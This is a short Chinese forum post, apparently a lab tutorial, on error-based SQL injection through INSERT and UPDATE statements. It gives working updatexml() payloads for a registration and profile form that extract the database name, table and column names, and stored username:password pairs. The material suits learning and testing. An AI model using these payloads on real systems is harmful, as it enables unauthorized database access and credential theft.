|
insert注入
关于update insert语句
update 数据库更新语句
insert 数据库插入语句
首先打开注册页面
我们填写数据,点击提交后抓包。
在用户名输入:
payload
[pre]
wangwu'or updatexml(1,concat(0x7e,(命令)),0) or'
[/pre]
爆出数据库
[pre]
test001' or updatexml(1,concat(0x7e,database()),0) or'
[/pre]
加在前面就行了
[pre]
username=test001' or updatexml(1,concat(0x7e,database()),0) or'&password=kali&sex=111&phonenum=1111&email=2222&add=china&submit=submit
[/pre]
放包即可
成功获取数据库
获取表
[pre]
test001' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or'
[/pre]
获取列
[pre]
test001' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or'
[/pre]
获取内容
[pre]
test001' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),0) or'
[/pre]
update注入
首先登陆
点击修改 进行抓包
[pre]
test'or updatexml(2,concat(0x7e,(database())),0) or'
[/pre]
其他请参考上面提到的语法。
|
发表于 2019-4-9 10:27:57
